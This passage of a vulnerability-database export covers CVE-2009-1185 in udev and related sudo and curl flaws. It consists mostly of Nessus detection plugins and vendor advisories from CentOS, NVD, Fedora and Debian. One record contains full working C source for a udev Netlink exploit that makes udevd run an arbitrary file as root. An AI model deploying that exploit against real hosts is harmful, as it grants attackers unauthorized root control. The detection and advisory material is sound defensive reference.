authorization\n decisions for users belonging to that group. A local\n attacker can exploit this to gain root privileges via a\n crafted sudo command. (CVE-2009-0034)\n\n - A flaw exists in the redirect implementation in libcurl\n that allows arbitrary Location values to be accepted\n when CURLOPT_FOLLOWLOCATION is enabled. An attacker\n with control of a remote HTTP server can exploit this,\n via crafted redirect URLs, to trigger requests to\n intranet servers, to read or write arbitrary files, or\n to execute arbitrary commands. (CVE-2009-0037)\n\n - A flaw exists in udev due to a failure to verify that a\n NETLINK message originates from the kernel space. A\n local attacker can exploit this, via a crafted NETLINK\n message, to gain elevated privileges on the root file\n system. (CVE-2009-1185)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2009-0009\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 264, 352);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware/version\");\nrelease = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\n\nfixes = make_array();\nfixes[\"ESX 4.0\"] = 175625;\n\nmatches = eregmatch(pattern:'^VMware (ESXi?).*build-([0-9]+)$', string:release);\nif (empty_or_null(matches))\n exit(1, 'Failed to extract the ESX / ESXi build number.');\n\ntype = matches[1];\nbuild = int(matches[2]);\n\nfixed_build = fixes[version];\n\nif (!isnull(fixed_build) && build < fixed_build)\n{\n padding = crap(data:\" \", length:8 - strlen(type)); # Spacing alignment\n \n report = '\\n ' + type + ' version' + padding + ': ' + version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + version + \" build \" + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:18", "description": "a. Service Console package udev\n\n A vulnerability in the udev program did not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1185 to this issue.\n\n Please see http://kb.vmware.com/kb/1011786 for details.\n\nb. Service Console package sudo\n\n Service Console package for sudo has been updated to version sudo-1.6.9p17-3. This fixes the following issue: Sudo versions 1.6.9p17 through 1.6.9p19 do not properly interpret a system group in the sudoers file during authorization decisions for a user who belongs to that group, which might allow local users to leverage an applicable sudoers file and gain root privileges by using a sudo command.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-0034 to this issue.\n\n Please see http://kb.vmware.com/kb/1011781 for more details\n\nc. Service Console package curl\n\n Service Console package for curl has been updated to version curl-7.15.5-2.1. This fixes the following issue: The redirect implementation in curl and libcurl 5.11 through 7.19.3, when CURLOPT_FOLLOWLOCATION is enabled, accepts arbitrary Location values, which might allow remote HTTP servers to trigger arbitrary requests to intranet servers, read or overwrite arbitrary files by using a redirect to a file: URL, or execute arbitrary commands by using a redirect to an scp: URL.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-0037 to this issue.\n\n Please see http://kb.vmware.com/kb/1011782 for details", "cvss3": {}, "published": "2011-02-17T00:00:00", "type": "nessus", "title": "VMSA-2009-0009 : ESX Service Console updates for udev, sudo, and curl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0034", "CVE-2009-0037", "CVE-2009-1185"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0"], "id": "VMWARE_VMSA-2009-0009.NASL", "href": "https://www.tenable.com/plugins/nessus/52011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2009-0009. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52011);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0034\", \"CVE-2009-0037\", \"CVE-2009-1185\");\n script_bugtraq_id(33517, 33962, 34536);\n script_xref(name:\"VMSA\", value:\"2009-0009\");\n\n script_name(english:\"VMSA-2009-0009 : ESX Service Console updates for udev, sudo, and curl\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESX host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. Service Console package udev\n\n A vulnerability in the udev program did not verify whether a NETLINK\n message originates from kernel space, which allows local users to\n gain privileges by sending a NETLINK message from user space.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-1185 to this issue.\n\n Please see http://kb.vmware.com/kb/1011786 for details.\n\nb. Service Console package sudo\n\n Service Console package for sudo has been updated to version\n sudo-1.6.9p17-3. This fixes the following issue: Sudo versions\n 1.6.9p17 through 1.6.9p19 do not properly interpret a system group\n in the sudoers file during authorization decisions for a user who\n belongs to that group, which might allow local users to leverage an\n applicable sudoers file and gain root privileges by using a sudo\n command.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-0034 to this issue.\n\n Please see http://kb.vmware.com/kb/1011781 for more details\n\nc. Service Console package curl\n\n Service Console package for curl has been updated to version\n curl-7.15.5-2.1. This fixes the following issue: The redirect\n implementation in curl and libcurl 5.11 through 7.19.3, when\n CURLOPT_FOLLOWLOCATION is enabled, accepts arbitrary Location\n values, which might allow remote HTTP servers to trigger arbitrary\n requests to intranet servers, read or overwrite arbitrary files by\n using a redirect to a file: URL, or execute arbitrary commands by\n using a redirect to an scp: URL.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-0037 to this issue.\n\n Please see http://kb.vmware.com/kb/1011782 for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2009/000060.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux udev Netlink Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 264, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2009-07-10\");\nflag = 0;\n\n\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-200906406-SG\",\n patch_updates : make_list(\"ESX400-201005409-SG\", \"ESX400-201009410-SG\", \"ESX400-201101404-SG\", \"ESX400-201305402-SG\", \"ESX400-Update01a\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-200906407-SG\",\n patch_updates : make_list(\"ESX400-200911232-SG\", \"ESX400-201009409-SG\", \"ESX400-201203403-SG\", \"ESX400-Update01a\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-200906411-SG\",\n patch_updates : make_list(\"ESX400-Update01a\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6 (Gentoo Ubuntu 8.109.04) UDEV 1.4.1 - Local Privilege Escalation (2)", "cvss3": {}, "published": "2009-04-30T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6 (Gentoo Ubuntu 8.109.04) UDEV 1.4.1 - Local Privilege Escalation (2)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2009-04-30T00:00:00", "id": "EXPLOITPACK:B0F3A3E95BDAC4AD03941D08C47B5CBA", "href": "", "sourceData": "/*\n * cve-2009-1185.c\n *\n * udev < 141 Local Privilege Escalation Exploit\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185\n *\n * udev before 1.4.1 does not verify whether a NETLINK message originates \n * from kernel space, which allows local users to gain privileges by sending \n * a NETLINK message from user space.\n *\n * Notes:\n * \n * An alternate version of kcope's exploit. This exploit leverages the \n * 95-udev-late.rules functionality that is meant to run arbitrary commands \n * when a device is removed. A bit cleaner and reliable as long as your \n * distro ships that rule file.\n *\n * Tested on Gentoo, Intrepid, and Jaunty.\n *\n * Usage:\n *\n * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, \n * usually is the udevd PID minus 1) as argv[1].\n *\n * The exploit will execute /tmp/run as root so throw whatever payload you \n * want in there.\n */\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/socket.h>\n#include <linux/types.h>\n#include <linux/netlink.h>\n\n#ifndef NETLINK_KOBJECT_UEVENT\n#define NETLINK_KOBJECT_UEVENT 15\n#endif\n\nint\nmain(int argc, char **argv)\n{\n\tint sock;\n\tchar *mp, *err;\n\tchar message[4096];\n\tstruct stat st;\n\tstruct msghdr msg;\n\tstruct iovec iovector;\n\tstruct sockaddr_nl address;\n\n\tif (argc < 2) {\n\t\terr = \"Pass the udevd netlink PID as an argument\";\n\t\tprintf(\"[-] Error: %s\\n\", err);\n\t\texit(1);\n\t}\n\n\tif ((stat(\"/etc/udev/rules.d/95-udev-late.rules\", &st) == -1) &&\n\t (stat(\"/lib/udev/rules.d/95-udev-late.rules\", &st) == -1)) {\n\t\terr = \"Required 95-udev-late.rules not found\";\n\t\tprintf(\"[-] Error: %s\\n\", err);\n\t\texit(1);\n\t}\n\n\tif (stat(\"/tmp/run\", &st) == -1) {\n\t\terr = \"/tmp/run does not exist, please create it\";\n\t\tprintf(\"[-] Error: %s\\n\", err);\n\t\texit(1);\n\t}\n\tsystem(\"chmod +x /tmp/run\");\n\n\tmemset(&address, 0, sizeof(address));\n\taddress.nl_family = AF_NETLINK;\n\taddress.nl_pid = atoi(argv[1]);\n\taddress.nl_groups = 0;\n\n\tmsg.msg_name = (void*)&address;\n\tmsg.msg_namelen = sizeof(address);\n\tmsg.msg_iov = &iovector;\n\tmsg.msg_iovlen = 1;\n\n\tsock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);\n\tbind(sock, (struct sockaddr *) &address, sizeof(address));\n\n\tmp = message;\n\tmp += sprintf(mp, \"remove@/d\") + 1;\n\tmp += sprintf(mp, \"SUBSYSTEM=block\") + 1;\n\tmp += sprintf(mp, \"DEVPATH=/dev/foo\") + 1;\n\tmp += sprintf(mp, \"TIMEOUT=10\") + 1;\n\tmp += sprintf(mp, \"ACTION=remove\") +1;\n\tmp += sprintf(mp, \"REMOVE_CMD=/tmp/run\") +1;\n\n\tiovector.iov_base = (void*)message;\n\tiovector.iov_len = (int)(mp-message);\n\n\tsendmsg(sock, &msg, 0);\n\n\tclose(sock);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-04-30]", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T11:54:06", "description": "udev is vulnerable to privilege escalation. It was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world-writable block device file for an existing system block device (for example, the root file system).\n", "cvss3": {}, "published": "2020-04-10T00:37:54", "type": "veracode", "title": "Privilege Escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2023-02-13T07:28:05", "id": "VERACODE:23846", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-23846/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2023-05-31T16:18:30", "description": "**CentOS Errata and Security Advisory** CESA-2009:0427\n\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in\norder to provide greater hot plug functionality. Netlink is a datagram\noriented service, used to transfer information between kernel modules and\nuser-space processes.\n\nIt was discovered that udev did not properly check the origin of Netlink\nmessages. A local attacker could use this flaw to gain root privileges via\na crafted Netlink message sent to udev, causing it to create a\nworld-writable block device file for an existing system block device (for\nexample, the root file system). (CVE-2009-1185)\n\nRed Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\nresponsibly reporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2009-April/065271.html\nhttps://lists.centos.org/pipermail/centos-announce/2009-April/065272.html\n\n**Affected packages:**\nlibvolume_id\nlibvolume_id-devel\nudev\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2009:0427", "cvss3": {}, "published": "2009-04-20T10:22:21", "type": "centos", "title": "libvolume_id, udev security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2009-04-20T10:22:21", "id": "CESA-2009:0427", "href": "https://lists.centos.org/pipermail/centos-announce/2009-April/065271.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-03T14:37:06", "description": "udev before 1.4.1 does not verify whether a NETLINK message originates from\nkernel space, which allows local users to gain privileges by sending a\nNETLINK message from user space.", "cvss3": {}, "published": "2009-04-17T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1185", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2009-04-17T00:00:00", "id": "UB:CVE-2009-1185", "href": "https://ubuntu.com/security/CVE-2009-1185", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-03T14:02:05", "description": "udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.", "cvss3": {}, "published": "2009-04-17T14:30:00", "type": "cve", "title": "CVE-2009-1185", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2023-02-13T02:19:00", "cpe": ["cpe:/o:opensuse:opensuse:11.1", "cpe:/o:canonical:ubuntu_linux:7.10", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/a:juniper:ctpview:7.1", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:opensuse:opensuse:10.3", "cpe:/o:opensuse:opensuse:11.0", "cpe:/o:canonical:ubuntu_linux:6.06", "cpe:/o:suse:linux_enterprise_desktop:11", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:fedoraproject:fedora:10", "cpe:/a:juniper:ctpview:7.2", "cpe:/a:suse:linux_enterprise_debuginfo:10", "cpe:/o:canonical:ubuntu_linux:8.04", "cpe:/a:suse:linux_enterprise_debuginfo:11", "cpe:/o:fedoraproject:fedora:9", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:suse:linux_enterprise_desktop:10"], "id": "CVE-2009-1185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1185", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:-:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:10:sp2:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:-:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:-:*:*:*", "cpe:2.3:o:fedoraproject:fedora:10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:9:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp2:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.1:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11:-:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:juniper:ctpview:7.2:-:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:10.3:*:*:*:*:*:*:*", "cpe:2.3:a:juniper:ctpview:7.1:r1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:10:sp2:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:juniper:ctpview:7.1:-:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.0:*:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "description": "The udev package contains an implementation of devfs in userspace using sysfs and netlink. ", "cvss3": {}, "published": "2009-04-16T16:54:24", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: udev-124-4.fc9", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-16T16:54:24", "id": "FEDORA:A322710F85A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NDRUXACIVXOFUA6Z6JO45DE7I5URNBZO/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The udev package contains an implementation of devfs in userspace using sysfs and netlink. ", "cvss3": {}, "published": "2009-04-16T16:54:34", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: udev-127-5.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-16T16:54:34", "id": "FEDORA:689ED10F87B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/62J7LBDMHPE3IJSLLY2BLVB356M3WOC2/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:33:20", "description": "\nSebastian Kramer discovered two vulnerabilities in udev, the /dev and\nhotplug management daemon.\n\n\n* [CVE-2009-1185](https://security-tracker.debian.org/tracker/CVE-2009-1185)\nudev does not check the origin of NETLINK messages, allowing local\n users to gain root privileges.\n* [CVE-2009-1186](https://security-tracker.debian.org/tracker/CVE-2009-1186)\nudev suffers from a buffer overflow condition in path encoding,\n potentially allowing arbitrary code execution.\n\n\nFor the old stable distribution (etch), these problems have been fixed in\nversion 0.105-4etch1.\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.125-7+lenny1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your udev package.\n\n\n", "cvss3": {}, "published": "2009-04-16T00:00:00", "type": "osv", "title": "udev - privilege escalation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2022-07-21T05:46:50", "id": "OSV:DSA-1772-1", "href": "https://osv.dev/vulnerability/DSA-1772-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:32", "description": "Privilege escalation with NETLINK messages, buffer overflow on path encoding.", "cvss3": {}, "published": "2009-04-19T00:00:00", "type": "securityvulns", "title": "udev multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-19T00:00:00", "id": "SECURITYVULNS:VULN:9846", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9846", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1772-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nApril 16, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : udev\r\nVulnerability : several\r\nProblem type : local\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2009-1185 CVE-2009-1186\r\n\r\nSebastian Kramer discovered two vulnerabilities in udev, the /dev and\r\nhotplug management daemon.\r\n\r\nCVE-2009-1185\r\n\r\n udev does not check the origin of NETLINK messages, allowing local\r\n users to gain root privileges.\r\n\r\nCVE-2009-1186\r\n\r\n udev suffers from a buffer overflow condition in path encoding,\r\n potentially allowing arbitrary code execution.\r\n\r\nFor the old stable distribution (etch), these problems have been fixed in\r\nversion 0.105-4etch1.\r\n\r\nFor the stable distribution (lenny), these problems have been fixed in\r\nversion 0.125-7+lenny1.\r\n\r\nFor the unstable distribution (sid), these problems will be fixed soon.\r\n\r\nWe recommend that you upgrade your udev package.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nSource archives:\r\n\r\n 